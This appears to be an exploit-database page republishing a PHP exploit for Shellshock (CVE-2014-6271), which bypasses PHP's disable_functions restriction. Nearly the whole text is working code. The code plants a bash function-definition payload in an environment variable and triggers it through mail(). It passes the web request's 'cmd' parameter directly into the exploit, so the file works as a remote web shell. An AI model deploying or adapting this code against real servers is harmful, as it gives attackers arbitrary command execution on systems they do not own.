PHP 5.x - Bypass Disable Functions Vulnerability



EKU-ID: 4379 CVE: 2014-6271 OSVDB-ID:
Author: Ryan King Published: 2014-11-18 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions)
# Google Dork: none
# Date: 10/31/2014
# Exploit Author: Ryan King (Starfall)
# Vendor Homepage: http://php.net
# Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror
# Version: 5.* (tested on 5.6.2)
# Tested on: Debian 7 and CentOS 5 and 6
# CVE: CVE-2014-6271
   
<?php
function shellshock($cmd) { // Execute a command via CVE-2014-6271 @
mail.c:283
   if(strstr(readlink("/bin/sh"), "bash") != FALSE) {
     $tmp = tempnam(".","data");
     putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");
     // In Safe Mode, the user may only alter environment variables
whose names
     // begin with the prefixes supplied by this directive.
     // By default, users will only be able to set environment variables
that
     // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive is
empty,
     // PHP will let the user modify ANY environment variable!
     mail("a@127.0.0.1","","","","-bv"); // -bv so we don't actually
send any mail
   }
   else return "Not vuln (not bash)";
   $output = @file_get_contents($tmp);
   @unlink($tmp);
   if($output != "") return $output;
   else return "No output, or not vuln.";
}
shellshock($_REQUEST["cmd"]);
?>